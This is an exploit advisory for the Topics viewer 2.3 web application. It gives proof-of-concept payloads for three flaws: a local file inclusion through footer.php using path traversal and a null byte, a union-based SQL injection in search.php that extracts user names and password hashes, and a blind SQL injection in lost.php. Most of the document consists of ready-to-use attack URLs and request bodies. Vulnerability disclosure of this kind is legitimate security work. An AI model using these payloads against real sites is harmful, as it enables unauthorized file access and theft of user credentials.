################################################################################################ # Exploit Title: Topics viewer v 2.3 Multiple Vulnerabilities # Software Link: http://nilehoster.com/default/topicsviewer # Author: n4ss1m # Date: 19-05-2012 # Tested on: win/linux # Home : www.Sec4ever.com ################################################################################################ # Local File Inclusion ( footer.php ) "; @include ("themes/$site_theme/templates/footer_head.html"); # <-- $site_theme without value echo "
"; ...etc... ?> # PoC : http://domain.tld/footer.php?site_theme=../robots.txt%00 # Note : register_globals must be ON ################################################################################################ # SQL injection ( search.php ) # PoC : http://domain.tld/search.php?q=junk'+union+select+1,group_concat(u_name,0x3a,u_mpass),3,4,5,6,7,8,9,10,11,12+from+users+where+u_id=1%23&search=true # magic_quotes_gpc must be OFF ################################################################################################ # Blind SQL injection ( lost.php ) # PoC : POST : uname=junk'[SQL injection]%23®_mail=email@email.tld&to_mail=email2@email.tld&B1=true http://domain.tld/lost.php # magic_quotes_gpc must be OFF ################################################################################################ # References : http://www.exploit4arab.com/exploits/69 # Vendor reported on : 19-05-2012 # published on : 27-05-2012 ################################################################################################